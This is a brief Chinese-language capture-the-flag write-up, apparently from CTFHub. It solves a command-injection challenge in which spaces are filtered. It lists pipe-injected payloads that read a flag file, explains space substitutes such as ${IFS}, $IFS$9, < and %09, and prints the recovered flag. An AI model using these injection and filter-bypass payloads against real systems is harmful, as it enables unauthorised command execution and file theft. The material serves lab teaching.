1. 查看当前目录:127.0.0.1|ls
2. 查看 flag_890277429145.php
127.0.0.1|cat flag_890277429145.php
根据题目可以知道空格被过滤掉了
3.空格可以用以下字符代替:
< 、>、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等
$IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。
同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。
payload:
127.0.0.1|cat<flag_890277429145.php|base64
127.0.0.1|cat>flag_890277429145.php|base64
127.0.0.1|cat${IFS}flag_890277429145.php|base64
127.0.0.1|cat$IFS$9flag_890277429145.php|base64
base64 解密:
<?php // ctfhub{0f8603081311cfa9c7d1f760}
